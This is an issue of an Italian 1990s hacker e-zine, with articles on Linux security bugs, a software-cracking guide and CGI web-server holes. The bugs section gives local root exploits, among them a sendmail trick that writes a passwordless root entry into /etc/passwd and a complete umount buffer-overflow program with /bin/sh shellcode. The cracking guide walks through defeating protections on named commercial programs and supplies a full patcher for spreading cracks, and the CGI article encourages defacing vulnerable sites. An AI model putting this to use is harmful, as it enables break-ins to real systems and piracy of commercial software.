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D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Chiunque venisse in possesso di questa rivista e' pregato di NON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postarla su NESSUN TIPO di newsgroup. Gli autori di questo testo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non si prendono nessuna responsabilita' per l'uso che ne verra'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fatto poiche' e' stata espressamente concepita per puri scopi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informativi.                                                      *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zi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ve di nuovo a tut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 di ogni altra cosa, mi devo scusare con tutti voi per i ritardi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 subito l'uscita del nø4 ma sia io, sia i miei compagni siamo stati mol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gnati a livello lavorativo-scolastico e cio' ha contribuito al ritar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gia conosc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questo numero si apre una nuova rubric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avevo gia accennato nel terzo volume di questa rivista, una parte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down verra' dedicata a chi legge, ovvero ognuno di voi potra' mand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articolo che, nei successivi numeri, verra' pubblicato in queste pa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lo facciamo non perche' ci sentiamo piu' "in alto" di altri permette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scrivere su questa rivista come se fosse chissa' cosa, ma perche' penso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nuno debba avere la possibilita' di esprimere le proprie idee, i prop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tti e le proprie scoper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ndi vi invito, se la cosa vi puo' interessare, a scriverci mandando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stri articoli in .txt e, se risultassero eccessivamente lunghi, in for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ippata ( giusto per facilitarci un po' il download della mail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so quanti di voi vorranno inviarci un articolo ma, anche se ne arriva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 uno all'anno saremo lieti di pubblicarlo insieme a tutti gli alt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primo ad occupare questo nostro nuovo spazio e' Cavallo de Cavallis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ua guida alla sopravvivenza per i non-crakkat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to che un nostro amico di nome Hank ci ha scritto praticamente qual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tante dopo Cavallo abbiamo deciso di inserire anche lui per poter inaugur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meglio questa se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piccola informazione che non so se avete letto o sentito da qualche par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 3 dicembre, pare, i paradisi telematici sparsi per tutta Italia (v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paesi in cui ancora non c'e' la TUT) cadranno vittime di madre telecom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 tramutera', facendoli cadere nella solita, vecchia storia degli scat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fonici urban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e comunque che non tutti i comuni vengano colpiti da questo "ciclone"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ndi non resta che attendere e sper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InfectedMachine ( fn-infected@community.co.u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Bugs ( by RaggedRobin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The Xoanon's Guide to Cracking ( by Xoanon ) IIIø e ultima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CGI che passione... ( by Jack McKra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Articolo Teorico/Cannato - Ordine e Password ( by Jack McKra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I siti del Dr.Creker ( by Dr.Creker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Guida alla Sopravvivenza per non-crakkatori ( by Cavallo de Cavalli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Consigli per il laming ( by Han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raziamen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r Manif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Bugs ( by RaggedRobin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ve gente, siccome questo mese c'e' gia' l'influenza in giro, ho prefer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tare di spargere altri vir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questo numero vi presentero' i miei amici bacherozzi, no non il Dr.Cr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Inf, ma quelle simpatiche bestioline da sistema che ogni tanto si scop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tino nei sistemi operativ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a volta vi presentero' per lo piu' bug del linux, se mai vi dove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sare l'argomento nel prossimo numero potrei presentarvene qualcun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: tel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: red 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: Facendo un telnet se si sbaglia login si viene sbattutti fuori d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istema se invece si inserisce una login corretta ma si sbagli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assword il sistema chiede nuovamente login e pass senza sbatterti fu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: ad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: linux con admin-v1.2 e versioni preceden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: admin-v1.2 e un tool per gli amministratori di sistema. Attraverso i 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i questo tool un local user puo' cancellare qualsiasi file su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egandosene dei permes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dmin-v1.2 scrive i dati riguardanti gli user, menu ed altre cose in /t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nomi di questi files vengono creati attraverso la sintassi /tmp/name.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cuni non usano il suffisso $$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S)fortunatamente, admin-v1.2 non contralla se questi files gia' esist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 segue i simly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' quindi possibile sovrascrivere qualsiasi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n qualsiasi manigoldo puo' per esempio linkare uno di questi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mporanei a /etc/passwd o ad /.rhosts ed aspettare che l'amministra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i sistema lanci adminv1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l file bersaglio verrebbe cancella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uzione: rimuovere adminv1.2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: Lizards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: Linux Slackware 3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: Un bug nel gioco Lizard che viene fornito con la Slackware 3.4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ackage e consente ad utenti normali di avere accessi da r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el codice del gioco nella seconda riga c'e': system("clear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>return EXIT_SUCCES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iccome il programmma esegue "clear" (supponendo di esse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/usr/bin/clear) con privilegi da root basta cambiare lo user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nvironment variable in qualcosa come PATH=.:/usr/game/lizardlib e p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reare un symlink (o uno script sh) chiamato "clear" che esegua una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d un tuo link, facendo in modo che il comando venga eseguito come r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inche il gioco gi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uzione: chmod -s /usr/games/lizardlib/lizards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: send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: tutti i sistemi che hanno la sendmail 8.8.3, 8.8.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a: Facendo un hard link da /etc/passwd a /var/tmp/dead.letter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telnettando alla porta 25 si puo' inviare una mail ad un h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rraggiungi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l messaggio sara' scritto in passw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cco un exploit fatto utilizzando questo bu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telnet 0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0.0.0.0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ed to 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 character is '^]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20 myhost ESMTP Sendmail 8.8.3/8.6.12; Mon, 24 Mar 1997 20:39:0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0500 (E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o localh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myhost Hello localhost [127.0.0.1], pleased to mee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8BITM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DS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ON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ET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-XUS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from: ljuboz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 ljubozat... Sender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cpt to: blabla@no-such-host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0 blabla@no-such-host.net... Recipient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4 Enter mail, end with "." on a line by it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r::0:0:Toor de Root:/:/bin/k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funziona su grossi sistemi con partizioni perche' si puo' fare sol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 link sullo stesso file sistem. Un altra cosa e' che in sistemi co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AILER-DAEMON' definito il demon prende la posta invece di salvarl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var/tmp/dead.letter, per esempio, fare un file /etc/aliases che definis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MAILER-DAEMON. Per fare un altro esempio Pinco aggiunge queste due al su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etc/alia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ER-DAEMON:Pin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tmaster:Pinc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ndi scrivete solo 'newaliases' e potete andare con un filo di g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uzioni: create un file /var/temp/dead.letter con permessi chmod 06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osi' nessuno puo' fare hard link a etc/passw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: mount-u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: Linux Red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a: Il bug si trova nel programma mount/unmount nel util-linux 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ackage. Se installato suid-to-root, questo programma cons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gli utenti locali di ottenere privilegi da super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Le utilities mount/unmount della util-linux 2.5 hanno problemi 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overrun. Installando mount/unmount come programma suid-to-ro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' necessario concedere agli utenti locali di fare il moun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unmount sui media removibili senza avere i privilegi di su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user. Se questa possibilita' non e' necessaria e' raccomandat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ogliere il suid bit sia dal programma mount che da unmo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ccovi un exploit che utililizza il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unistd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lib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fcnt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ta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PATH_MOUNT "/bin/umou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BUFFER_SIZE 1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DEFAULT_OFFSET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_long get_esp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__asm__("movl %esp, %eax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int argc, char **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_char execshell[]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eb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0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b8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xc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80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"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 *buff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signed long *addr_ptr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 *ptr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ofs = DEFAULT_OFFS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ff = malloc(4096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!bu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can't allocate memory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xit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= bu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* riempie l'izio del buffer con nops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mset(ptr, 0x90, BUFFER_SIZE-strlen(execshell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+= BUFFER_SIZE-strlen(execshe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* infila il codice assembler nel buffer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(i=0;i&lt;strlen(execshell);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*(ptr++) = execshell[i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ddr_ptr = (long *)pt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(i=0;i&lt;(8/4);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*(addr_ptr++) = get_esp() + of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= (char *)addr_pt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*ptr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oid)alarm((u_int)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ecl(PATH_MOUNT, "umount", buff, NU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uzione: rimuovere il suid bit con il coman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hmod u-s /bin/mount /bin/u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: squ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: Lin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i: Squake per Linux garantisce un accesso da root se e installa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 mode 475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 si richiama vga_init() all'inizio di main(), nessun probl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 si richiama in seguito, tutto quello eseguito prima di vga_init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ara' eseguito come r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 si riesce a causare un segfault mentre il programma e'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secuzione si puo' ottenere di essere root. Probabilmente ci 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iversi modi di causare un segfault ma il piu' ovvio e' utilizz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a riga di coman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quake -game aaaaaaaaa (152 a in tot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: r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: Lin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i: C'e un bug nel autenticazione del remote login nel modu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Linux-PAM-0.57 e 0.58 , come conseguenza gli account degli utent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ordinari non sono protetti da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'e' solo un caso nel quale il bug funzioni: quando nel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.rhost l'ultima entry e' il nome di una macchina con piu' di u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dirizzo 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cco due esempi di .rho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BUGGATO                           NON BUGG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karman.tam.uiuc.edu               vn.nas.nasa.g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vn.nas.nasa.gov                   karman.tam.uiuc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l sito vn.nas.nasa.gov ha due indirizzi ip e un utente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o stesso nome si puo' infilare senza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l problema e' nel modulo rhost del PAM. Il modulo richia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gethostbyname() in due punti, una per la macchina che si connet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'altra per ogni entry nominata nel file ".rhosts". La chiam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stituisce una struttura con un puntatore ad una lista di indirizz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ip. Siccome possono essere indirizzi ip multipli, il codice P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usa un ciclo while sugli indirizzi ip della macchine che si connet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oi un' altro ciclo while con gli indirizzi in ".rhost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Questi cicli while finiscono con un puntatore null nella list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dirizz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si' la chiamata al gethostbyname() per le entry del .rhosts misch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 seguenti ip address della macchine che si conn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 l'ultima riga del file .rhosts e' un nome con indirizzo ip multip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l null viene rimpiazzato con il secondo indirizzo ip dell'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iga nel file ".rhos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Il secondo passo del ciclo while sulla macchina che si st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nettendo setta il numero della macchina che si connette s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numero ip dell'ultima riga del file ".rhost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 questo modo l'account e' aperto senza bisongo di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oluzioni: Controllare che l'ultima riga di .rhost abbia un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dirizzo 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otete usare il comando nslook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sempio di fi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 Linux-PAM-0.58.orig/modules/pam_rhosts/pam_rhosts_auth.c    Mon Aug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:14:14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++ Linux-PAM-0.58/modules/pam_rhosts/pam_rhosts_auth.c Wed Oct  1 11:43:14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@@ -524,25 +524,32 @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truct hostent *h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t answer = 1;                             /* default = fallito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u_long add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char **a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u_long *addr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int n,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ts-&gt;last_error = (char *)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p               = gethostbyname(rhost);      /* identifica host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(hp != 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ap = hp-&gt;h_addr_li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while (*ap) {                     /* loop sulla lista di indirizz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memcpy (&amp;addr, *ap, sizeof(addr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/* controlla user su remote host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if (pam_iruserok(pamh, opts, addr, superuser, ruser, lus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    ==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    answer = 0;                                /* successo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   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    ++a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     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/* loop sulla lista di indirizzi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for (n = 0; hp-&gt;h_addr_list[n]; n++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D(("rhosts: %d addresses", n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if (n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addrs = malloc (n * sizeof(*addrs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for (i = 0; i &lt; n; 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    memcpy (addrs+i, hp-&gt;h_addr_list[i], sizeof(*addrs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for (i = 0; i &lt; n &amp;&amp; answer; i++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    D(("rhosts: address %d is %04x", i, addrs[i]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    answer = pam_iruserok(pamh, opts, addrs[i], superus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                          ruser, luser, rhos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             /* risposta == 0 significa successo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    free (addr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       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eturn answ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aggedRo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The Xoanon's Guide to Cracking ( by Xoanon ) IIIø e ultima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ITOLO 3: CRACKING IN WINDOWS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---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 QUESTA PARTE SARO` PIU` SBRIGATIVO, SPECIE NEI CONCETTI DETTI E RIDET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LLE PARTI PRECEDENTI. SOPRATTUTTO, VI SPIEGHERO` IL FUNZIONAMENT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BUGGER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, dopo il cracking in dos, passiamo a Windows..... con tutti i suoi b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ini shareware che funzionano a meta', funzionano per 30 gg, e cazz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..... BASTA!!!! Vi salvero' da questo martirio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tto che trattero' solo Windows95 con il relativo SoftICE, ma penso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stesse nozioni valgano anche per Windows3.1 e NT (comunque, fatemi saper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innanzitutto installatevi il SoftICE95 (lo trovate sulla rete, b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 andiate a cercare con AltaVista la parola "Hack" o "Crack" e v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iranno migliaia di siti con tutti i debuggers che volet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volta installato, vi conviene farvi nella vostra AUTOEXEC.BAT un'aggiu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tip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/TN,10 Carico il SoftICE (S/N)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ERRORLEVEL 2 goto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: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ettete qui il comando che vi aggiunge il programma di i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es. c:\utility\sice95\sice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oltre, andate a modificare il file WINICE.DAT nella directory dov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ugger e' installato, modificando la riga con "X;" in questo mo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 ES:DI;LINES 50;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punto assicuratevi di settare il driver della scheda grafica d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 del SoftICE, dopodiche' siete pronti a debuggare. Su questo, facc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piccola aggiunta: a me, ad esempio, il driver della S3 fornito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ICE non funziona, quindi tutte le volte devo settare Windows95 a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i, senno' appena entro nel debugger svalvola lo schermo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questo per il SoftICE 2.0, con il 3.0 tutto funziona a meraviglia.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te il 2.0 andatevi a beccare i nuovi drivers al sito della NuMEGA, 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bra www.numega.com... ma non sono sicuro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 Nozioncine sul funzionamento di Windows95 (penso vada bene anche per 3.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ziamo con qualche delucidazione su come Windows lavora... che e' megli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dovete sapere che ad ogni cosa che accade sullo schermo (come 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empio, l'apparire di una finestra, il click di un bottone, insomma tutto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isponde una particolare API (funzione interna) del sistema operat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farvi capire meglio, se il programma vuole aprire una finestra non far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ro che usare le funzioni del sistema, e nel disassemblato vedrete, tra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re, una CALL USER!OPENWINDOW (o roba del genere, non ho il debugger qu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anti e a mente non me lo ricordo...). Quindi, per i nostri loschi sco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a intercettare alcune di queste chiamate, nella maggior parte dei ca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lle relative all'inserimento di testo oppure al click di un bot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questo ci viene in aiuto il comando dell'ICE, BMS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comando senta un particolare BP che vi riporta al beneamato debu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ni volta che questo intercetta una chiamata ad una specifica funzione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. La sintassi e' la seguen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MSG window-handle funzionedel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 spiego meglio: il Window-Handle non e' altro che il primo indirizzo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ate nella tabella che ottenete con HWND taskname (spiegato dop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te che accanto a questo valore, tra le altre cose, c'e' il nome dell'h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sso. Bene, questo ci serve a identificare l'handle che vogliamo allacci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 esempio, se avete un task di nome OMAR, e la finestra most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righe per inserire il testo (ad es. dati personali e S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bottoni (es. OK, Canc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do il comando HWND omar troverete 3 handle EDIT e 2 handle BUTTON (pi—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re cose). Dato che voi dovete inserire il SN (mettiamo) il vostro bersagl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a' uno dei 3 EDIT, giusto? Ma quale dei 3 ? Di solito il primo, perch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llo dove inserire il SN di solito appare per ultimo (funziona cosi'...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, provate, tanto se beccate quello giusto non appena premete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ritorna al debugger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 gia', le funzioni di sistema da intercettare....... eccone qualcuna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fara' sicuramente como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M_GETTEXT            Come nell'esempio, quando dovete inserire qualco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M_COMMAND            Quando dovete cliccare un bot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WINDOWTEXT         Sempre per il testo, applicazioni a 16-Bit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WINDOWTEXTA (o W)  Come sopra, ma per applicazioni a 32-Bit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DLGITEMTEXT        Ancora per il testo,16-Bit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DLGITEMTEXTA (o W) A 32-Bit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M_MOVE               Per tornare al debugger quando apre una nuova fines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(da usare se i precedenti non funzionan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= da usare con BPX al posto di BMSG (si ferma quando trova la call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egue la funzione, mentre con BMSG vi ritrovate dentro la fun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i sistema..... vabbe', e' uguale. Io uso solo WM_GETTEXT e WM_MO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 BMSG, poi fate voi..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 Esempio pratico di registrazione di uno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ito bene il paragrafo precedente? Bene, cominciam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i comandi principali li sapete gia' (andatevi a vedere il capit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aragrafo 2).... al SoftICE si accede con CTRL-D..... cosa c'e' anc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spiegare? Boh...... tagliamo la testa al toro e facciamo subit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'esempio, cosi' si spiega tutto senza star a fare rigirii inuti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prendete un bel programmino shareware di quelli che, ad esempi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zionano 30gg e poi non vanno piu'.... tipo il QuickView Plus 3.0 32-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volta installato, aprite un promptino del dos (infatti non vi crea l'ic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do un tipo-plug-in del Netscape) e caricate ORDER32.EXE. Quindi, click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 "Single User" poi su "Unlock by Phone". A questo punto, inserite il vos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ock code (senza premere return, mi raccomando!), naturalmente scazzato,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te CTRL-D per entrare nell'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punto, il primo passo da fare e' individuare il task corrispond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'ORDER32. Difatti, non e' detto che quando stoppate con CTRL-D andia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re proprio nell'area di memoria riservata al programma.... anzi, dici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on ci andrete a finire mai in questa manier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sogna fare quello che in gergo si chiama "PINPOINTING", ossia dobbi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cettare un messaggio che quella finestra di Windows manda a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vo, in modo da entrare cosi' nel task. Ordunque, individuiamo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k inserendo TASK &lt;return&gt;. Apparira' una lista con (fra gli altri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skName SS:SP      StackTop  StackBot StackLow TaskDB  hQueue  Events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  * GLI INDIRIZZI NATURALMENTE CAMBIANO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32  0000:0000  005ED000  005F0000          306E    30D7   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ol32  0000:0000  0073D000  006C0000          246E    25D7   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ray  0000:0000  00415000  003F0000          156E    2561   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punto, facciamo un bel HWND Order32, per avere una lista di tut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 handlers del task. Otteniamo questo (sempre tra gli altri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ndow Handle   hQueue          SZ      QOwner  Name    Window Proced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.......      *GLI INDIRIZZI CAMBIANO (E VE LO RIDIO!!!!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AC (2)        0E3F            32      ORDER32 Static  17DF:000052F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A4 (2)        0E3F            32      ORDER32 Edit    17DF:00000BF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B4 (2)        0E3F            32      ORDER32 Button  17DF:0000102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C50 (2)        0E3F            32      ORDER32 Button  17DF:0000102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ase alle cose spiegate nel paragrafo precedente, scegliamo come h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pinpointare quello EDIT a 01B4 (anche perche' e' l'unico edit che vi appa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punto, tornate al debugger con CTRL-D e premete return per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ttare il vostro input. Di colpo riapparira' l'ICE, e voi inizierete n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paggio.....fino ad arrivare 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.....  (INDOVINATE UN PO'? COSA FANNO GLI INDIRIZZI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4F:004049C8  ADD ESP,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4F:004049CB  TEST EAX,E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4F:004049CD  JNZ 00404A29   &lt; Se il SN Š sbagliato, non esegue il sal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4F:004049CF  PUSH 20          e vi d… il messaggio di err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, con le tecniche che ormai avrete appreso (ossia, cercare sempr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 condizionale precedente alla call che vi fa' uscire) non avrete difficolt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 individuare nel JNZ indicato sopra la "chiave" per questo crack. B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biarlo in JMP (con A 004049CD &lt;ret&gt; JMP 00404A29 &lt;ret&gt;) e..... bravi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 crakkate anche in Windows..... Azz, siete dei mostri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mente, per il cracking in Windows valgono anche le regole gener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egate e rispiegate, potete settare dei BPX (con l'apposito comando)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tare tutte le volte di ricominciare da capo, ecc... Unica cosa, dat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bilita' di intercettare direttamente la chiamata alla routine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ttazione dell'input con BMSG, non c'e' bisogno tutte le volte di cer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loop che aspetta l'inserimento. Per quanto riguarda gli HERE, anche qu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ho gia' spiegato nelle funzioni del debugger..... cos'altro c'e'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,gia': se siete nella merda fino al collo e volete cercare il vostro E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emoria, una volta tornati al debugger dopo il BMSG, fate ques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) inserite S 30:0 lffffffff 'il vostro S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guardate gli indirizzi che trovate. Quelli buoni sono di solito quel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30:80000000 e seguenti (il 30 e' fisso!). Tanto per controll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ate a vedere a questi indirizzi con D &lt;indirizzo&gt; e scorrendo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TA WINDOW con ctrl+frecce (o alt, non me lo ricordo. Comunque, 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a finestra dove appare l'immagine della memoria). Molte volte qu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i trovate direttamente, oltre a quello inserito da voi, il S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iusto gia' calcolato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) mettete un BPR (breakpoint-on-range) ai vari indirizzi che tro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no a trovare quello giusto. Di solito, quello giusto e' quello d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ppaiono vicino al SN anche gli altri dati inseri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) da qui, procedete come semp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nota sul Loader: lo potete usare, serve a farvi entrare nel debu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l'inizio del programma, per eseguirlo passo passo..... ma sincer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non l'ho mai usato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.... non so' cos'altro dirvi.... naturalmente, applicando queste no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i, potete anche provare a crackare qualcosa di diverso dallo shar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 esempio, provate con il Cubase 3.0, che ha la chiave hardware. Vi pos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antire che la protezione e' una vera puttanata. Basta entrare nel debu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i rincorsa" non appena appare l'inizio del Cubase e mettere un BMSG WM_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farlo tornare quando appare la finestra con scritto "Chiave non inserita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qui, trovate il jump condizionale ed Š fatta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NDICE: PATCHERS, TSR, TRAI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 Il PATCHER. Per distribuire i vostri cra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che cos'e' un patcher? Semplicemente, e' un programma che vi perm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distribuire a giro il vostro crack. Cioe', contiene delle istruzioni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no a scrivere sul file originale in modo da "sproteggerlo". Dunq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o alle ciance, via agevolo il mio PATCHER UNIVERSALE in Turbo Pascal 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potete compilare e usare vo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tto che, per fare dei patch dovete av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I bytes originali e quelli cambiati (deducibili come spiegato,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ftICE assemblando l'istruzione voluta e andando a vedere in memori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uali bytes corrisponde). Piu', naturalmente, un po' di bytes prima e do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uelli che volete cambi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Un disk-editor (uno qualsiasi, io ho l'HEXED che si trova su intern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L' UNP, per scompattare gli eseguibili che, essendo crunchati, non vi dan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 possibilita' di trovare al loro interno i bytes desiderati. Anche ques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 trova su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L'offset (cioŠ la posizione nel file) dei bytes da cambi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 vedete nel disk editor (mi raccomando, in decimal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La lunghezza del file bersaglio, per evitare che il patcher pos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dificare file con nome uguale, ma magari versione diver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////////////////////////TAGLIATE QUI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{$I-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* Simply follow the comments inside the file to customize your patch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* This proggy is TOTALLY free, i wrote it for myself to speed-up patching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* However, if you keep the "written by XOANON" lines, i will be glad!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* Hello to all crackerz/phreakerz/hackerz worldwide!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* Compile with Borland Turbo Pascal 7 or higher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os, cr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 : file of cha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: cha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lnam: string [80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lsiz: longi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ze: longi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, i, x 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cedure drawscre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 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  (' -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toxy (69,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        -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toxy (1,3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 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8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toxy (10,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  ('General Purpose Patcher 1.0 - Written by [&gt;X0aN0n&lt;] in 1996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lay (14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toxy (10,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  ('General Purpose Patcher 1.0 - Written by [&gt;X0aN0n&lt;] in 1996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lay (14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toxy (10,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  ('General Purpose Patcher 1.0 - Written by [&gt;X0aN0n&lt;] in 1996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lay (14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;writeln;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[PrOgRaM NaMe] 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name of the program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Cubase Score 3.0 for Windows  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[PaTcH DoNe By]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author of patch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Xoanon                        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(' [FiLe T0 RaPe] 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name of the file to be patched *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CUBASESC.EXE                  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[TyPe 0f PaTcH]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type of the patch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Dongle Crack -100%-           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results obtained patching the fil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[ReSuLtZ]      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the results obtained patching the fil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Simply, now your Cubase works!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[ByTeZ ChAnGeD]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Write in the line below how many bytes the patch will go to chang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2                                    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[NoTeZ]         :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 In the writeln lines below, you can add some notes (I.E. how to ru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ch)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Run this patch in your Cubase directory to crack it.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Personally, i see my patch more stable than others, bcoz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using it there are less "General Protection Errors".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 ('                   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 ('But, try it yourself......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lrsc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rawscre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ssign (f, 'CUBASESC.EXE'); (* Write here the name of file to be patched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lnam := 'CUBASESC.EXE';   (* Write here the name of file to be patched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lsiz := 2478080;         (* This is the lenght of file to be patched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set (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ze := filesize (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:= IOResu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a &lt;&gt; 0 then (*Error, file not found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ound (2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delay(1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nosound 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riteln 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rite ('Error 1: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rite (' File ',filna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riteln (' not found. Check your directory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halt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nd else    (* File found but filelenght doesn't match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f size &lt;&gt; filsiz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sound (2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delay (1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nosou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textcolor (15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 ('Error 2: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textcolor (7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(' File ',filna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 (' must be ',filsiz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ln (' bytes long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ln ('         Probably you have an incorrect/packed version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halt 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end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Everything is OK, let's PATCH!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(* First, we check if the file is already patched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eek (f,585299);  (*File offset of byte 1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read (f,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f c &lt;&gt; #116 then  (*This is the ORIGINAL value of byte 1, decim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gin (*Now we patch the file to its original stat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The following lines depends on how many bytes you have to chang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In this case, there are 3 bytes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If you have more, simply copy the first 3 lines 2,3,4,5,etc. times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The bytes must be entered in decimal format, I.E the NOP code $90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ed as #144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In all these line you must enter the ORIGINAL value of the bytes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eek (f, 585299); (* File offset of byte 1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 := #116;     (* Byte to write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rite (f, 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eek (f, 585300); (* File offset of byte 2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 := #2;       (* Byte to writ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rite (f, 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ound (2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delay (1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nosou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riteln ('File already patched. Now, back to original state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nd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The following lines depends on how many bytes you have to chang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In this case, there are 3 bytes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If you have more, simply copy the first 3 lines 2,3,4,5,etc. times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*The bytes must be entered in decimal format, I.E the NOP code $90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ed as #144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eek (f, 585299); (* File offset of byte 1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 := #144;       (* Byte to write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rite (f, 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eek (f, 585300); (* File offset of byte 2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 := #144;       (* Byte to write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rite (f, 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ound (2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elay(12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nosound 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riteln ('File successfully patched.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ritel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////////////////////////TAGLIATE QUI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, anche se i commenti sono in inglese (l'ho fatto per distribuirlo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et..... la traduzione mi sembra superflua....) si dovrebbe capire be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a andare a sostituire i valori indicati, se ci sono piu' bytes da cambi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deve copiare alcuni pezzi pi— volte.... insomma, e' gia' tutto fat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importante e' convertire i bytes in HEX in decimale, con una qualsia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olatrice.... Avete notato la funzione di unpatching? Bellina e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cosa da notare: quando non trovate i bytes nel file, puo' essere perch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 indirizzi li cambia direttamente in memoria, e quindi nel file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ate solo l'offset. Quindi, cercate magari qualche byte prima (mag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gnatevi i bytes delle istruzioni PUSH e POP precedenti, che quelle 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ate sempre) e andate a occhio. Tutto qu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. I TSR. Quando il patcher non basta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cos'Š il TSR? Š un programma che va a modificare il contenuto d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ia in maniera dinamica, ossia mentre il programma viene esegu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 principalmente quando il file magari e' compattato in una mani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rietaria e non potete quindi trovarvi dentro i by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tto che un TSR non lo so' scrivere, quindi, per evitare di sbattere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le a Moonshadow per farmelo in assembler, vi dico come usare un programmi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trovate insieme al G3X, il TSRC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funziona cosi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) Create un file testo del ti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numero &lt; interrupt al quale si aggancia. Deve essere nello stesso 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dell'istruzione. Per trovarlo, usate la funzione INT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del G3X su un interrupt di uso comune, es. il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CS:0000:ipdell'istruzione = byte1 byte2 byte3 byte4 (.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N CS:0000:ipdell'istruzione = bytenew1 bytenew2 bytenew3 bytenew4 (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Tornate al DOS e scrivete TSRCRACK nomefile.txt. Et voila', TSR pro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aturalmente, lo dovete caricare SEMPRE, prima del programma protet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metodo vale solo per i programmi che non usano il DOS4GW, e com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on usano dos-extenders. Per questi particolari programmi, bisogna cre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i TSR ad-hoc, e io..... non sono ancora in grado. Al limite, chiede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shadow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, niente paura: la quasi totalita' dei programmi (anzi, diciamo p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tti) non richiede TSR. Basta un patch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. Trainers, come finire i giochi senza cheat-mo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 saro' sbrigativo. Il metodo descritto funziona solo con i giochi n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ed mode (quindi niente DOS4GW o extenders var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) Caricate il G3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Caricate il gioco, iniziate a gio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) Entrate nel G3X e scegliete GLOBAL ANALYSIS, BYTE, &lt;return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) Tornate al gioco e perdete una vita o fate diminuire l'energia o il t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) Entrate nel G3X, GLOBAL ANALYSIS, DECR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) Ripetete dal punto 4 al 5 per un po' di volte, fino a quando non tro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na locazione giusta..... cioe', con i valori es. 04 03 02 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) Mettete un BP Read-Write a quella loc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) Tornate al gioco, riperdete una vita/energia/t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) Quando torna al debugger (se la locazione e' giusta) segnatevi i by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ll'istruzione (di solito un DEC) e da qui in poi, procedete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 fosse un crack qualsiasi (disk editor, patch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vi allego il patcher modificato, tanto penso che la cosa sia intuit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ticamente, basta cambiare le scritte, il procedimento a' lo stes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siderate che quando fa' il patch mette il trainer, quando fa' l'unp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orta il gioco in condizioni norm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do ora tutti i giochi in protected mode, comunque, questo metodo funzi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 con i giochi vecchi..... oppure con gli emulatori tipo C64S (pero'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o caso non fate il patcher, meglio caricare il G3X in memoria og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lta che si vuol giocare!). Se volete fare trainer per i giochi in DOS4G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lio prendere qualcosa tipo il GameWizard32 (lo trovate su intern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I E CONSIDERAZIONI FIN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que, siamo alla fine. Spero che questo tutorial vi sia servito, io da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a ho cercato di farlo nel migliore dei modi, accessibile a tut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n pensate comunque di riuscire a crackare qualcosa alla prima, il tu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chiede logicamente un po' di pratica. Man mano che proverete, comunqu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erete tutto piu' facile di volta in vol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trovare i programmi necessari (SoftICE x Windows95, se volete anche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, e il disk editor), basta cercare con AltaVISTA o simili la parola "Hac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"Crack" o "Phreak". Troverete migliaia di siti, basta cercare un mini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troverete quello che cerc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oltre, scarivatevi *SUBITO* la guida di +ORC (la migliore al mondo e pen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'universo) .... le varie parti abbastanza aggiornate le trova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dodgenet.com/~kwantam nella sezione "Hacking Textz". Ci sarebbe anch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o quasi-ufficiale di +ORC, ma quello non ve lo dico.... vi rovinerei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ertimento nel cercarlo..... sappiate solo che con i vari spiders non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erete mai, quindi .... l'unica a' rovistare tra i vari links nelle pa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ckers per vedere se scovate qualcosa! Eh eh eh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curamente ho tralasciato qualcosa (e chi non lo fa'), ma d'altra parte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evo certo spiegarvi TUTTE le situazioni (cambiano sempre)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resto, basta un po' di pratica e troverete da soli le risposte alle vos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mande! Ah, dimenticavo: &gt;&gt;&gt;&gt;&gt;NON MI E-MAILATE TANTO NON VI RISPONDO&lt;&lt;&lt;&lt;&lt;&l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, swanne, mi raccomando eh? ir tegame di tu ma se mandi ir mi indirizz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o..... un mi vorrai mia fa' arresta' eh? Senno' poi l'artiolini ganzi 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 li scrive..... via swanne, ammodino eh, che se stai bono ti fo' an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 crachin manua' in livornes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Greetings to:   MoonShadow (Assembler Consul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l the PiNNACLE Crew (Zima Man,Hyper,Blaze,Jok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Silky,MrMox,X-c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the oth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rencher   (For the long time spent togeth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cracking..... and for help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 xml:space="preserve">in programming the first patcher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di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lonel    (Moral Sup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eppe      (Moral Sup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l the rest of MeltBody Team (Moral Sup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mma e Babbo (Per le sigarette fornite... in tu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penso 2 pacchetti in 1 settiman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duro lavor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       A       P       P       Y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C       R       A       C       K       I       N       G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.   .   .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***                 ** * * * * * *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***                  **  .   .   .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***   ***  ***   ****** **  **   ***   **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*** ***  ** **  **  ** *** **  ** **  ***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***   **   ** ****** ** *** **   ** **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** **   ** **  *** ** **  **  ** **  **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***   ***  ***   **  ** **   *   ***   **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***       **     **       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***            ****     .PiNNACLE Industries.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**            **      .   Chief Cracker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CGI che passione... ( by Jack McKra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questo articolo vi parlero' dei bug piu' comuni riscontrati all'inter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gli script CGI dei vari gestori di pagine Web, come Apache o NCSA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 di iniziare occorre pero' qualche precisazione: questi bugs ormai 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po' datati, in America e' praticamente impossibile trovare siti dove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ono ancora utilizzare per entrare senza permessi... in Italia pero',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solito, non e' raro imbattersi in indirizzi www che hanno ancora g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 incriminati attiv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cio dunque appello a tutti quelli che leggeranno questo articolo a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usare del potere concesso e a non provocare danni ai siti in question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motivo principale e' che siete rintracciabili e se fate inkazz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mministratore questo puo' anche risalire a voi e aprirvi un altro buco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lo, in secondo luogo perche' e' da pirla entrare in un server e danneggiar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cellando file.. una dimostrazione solo della propria deficenza, non d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rie capacita'.. molto piu' divertente invece editare qualche pagina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lche gif per infilare propri messaggi, magari scrivendoci anche d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zate, cosi' per far fare quattro risate a chi si connette, sen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tenare eccessivamente l'ira di chi lo gestisc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CGI sono dei programmini utilizzati per rendere disponibili i piu' svaria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izi a chi si connette dal proprio browser.. c'e' quello che ti dice qu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e sono entrate, quello che ti ricerca documenti, quello che ti invia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e notizie, ecc.. pero' l'elevata versatilita' di questo strumento cau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'inevitabile perdita nella sicurezza globale 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ni tanto infatti si scopre che un innocentissima script CGI, nata mag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controllare la velocita' delle connessioni, impostata diversamen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ssa' per quale stranissimo motivo, ti permette di agire sul server com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sse il tuo P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e prossime righe vi illustrero' i casi piu' famosi di questi scrip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i che sono stati la causa della rovina di molti host e della glori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ti hacker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-c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si puo' intuire questo script e' stato congegnato per testar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zionamento delle CGI del server in questione.. scrivendo dal prop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wser http://www.sito.com/cgi-bin/test-cgi dovrebbe apparire la segu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erm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I/1.0 test script repo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gc is 1. argv is \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SOFTWARE = NCSA/1.4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NAME = www.sit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EWAY_INTERFACE = CGI/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ROTOCOL = HTTP/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ORT =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EST_METHOD =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_ACCEP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INFO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TRANSLATE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_NAME = /cgi-bin/test-c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RY_STRING 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HOST = remote.machine.com   // nota.. qui e' riportato il vos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rizzo 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ADDR = 255.255.255.255      // 